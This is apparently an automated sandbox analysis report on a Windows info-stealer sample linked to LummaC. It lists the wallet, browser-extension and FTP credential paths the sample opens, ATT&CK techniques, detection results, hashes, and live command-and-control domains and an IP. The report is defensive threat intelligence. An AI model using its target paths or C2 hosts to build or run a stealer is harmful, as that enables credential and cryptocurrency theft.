                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1538148540.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1537765553.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 851 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 44 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
fer4JIJGeL.exe | 58% | ReversingLabs | Win32.Trojan.Symmi |
fer4JIJGeL.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
fer4JIJGeL.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://mindhandru.buzz/ku | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/4 | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/~Z | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/pil | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/apisZV | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/Win | 100% | Avira URL Cloud | malware |
https://mindhandru.buzz/apill | 100% | Avira URL Cloud | malware |
http://crl.micro8 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mindhandru.buzz | 172.67.165.185 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | false | | high
https://mindhandru.buzz/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/ku | fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510562445.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510838458.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1512013029.0000000005FED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/4 | fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/ | fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488788404.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.0000000001812000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488770291.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488938097.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.000000000180B000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488678588.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/Win | fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993. | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/pi | fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/d | fer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44 | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/~Z | fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro8 | fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538148540.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608248734.000000000187E000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.0000000001871000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/apill | fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/pil | fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/apisZV | fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581241
Start date and time: 2024-12-27 08:59:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fer4JIJGeL.exe (renamed because the original name is a hash value)
Original Sample Name: 0d3b04489baa22c2f702c549466b64f4.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target fer4JIJGeL.exe, PID 7656 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: fer4JIJGeL.exe
Time | Type | Description
03:00:15 | API Interceptor | 8x Sleep call for process: fer4JIJGeL.exe modified
Match: 172.67.165.185
Associated Sample Name / URL | Detection | Threat Name
cFLK1CiiNK.exe | malicious | LummaC
ZvHSpovhDw.exe | malicious | LummaC
PH1D3KHmOD.exe | malicious | LummaC
7jKx8dPOEs.exe | malicious | LummaC
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
zi042476Iv.exe | malicious | LummaC
U7TAniYFeK.exe | malicious | LummaC
ZBbOXn0a3R.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
P0SJULJxI0.exe | malicious | LummaC
r06aMlvVyM.exe | malicious | LummaC

Match: mindhandru.buzz
Associated Sample Name / URL | Detection | Threat Name | Context
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
wJtkC63Spw.exe | malicious | LummaC | 172.67.165.185
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101

Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
wJtkC63Spw.exe | malicious | LummaC | 172.67.165.185
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 172.67.165.185
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 172.67.165.185
ARoqFi68Nr.exe | malicious | LummaC | 172.67.165.185
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 172.67.165.185
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
                                                                                                              No context
                                                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949528536269432
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: fer4JIJGeL.exe
File size: 1'854'976 bytes
MD5: 0d3b04489baa22c2f702c549466b64f4
SHA1: 9f7abb36d9fffd4d6cb236c8e119359517691729
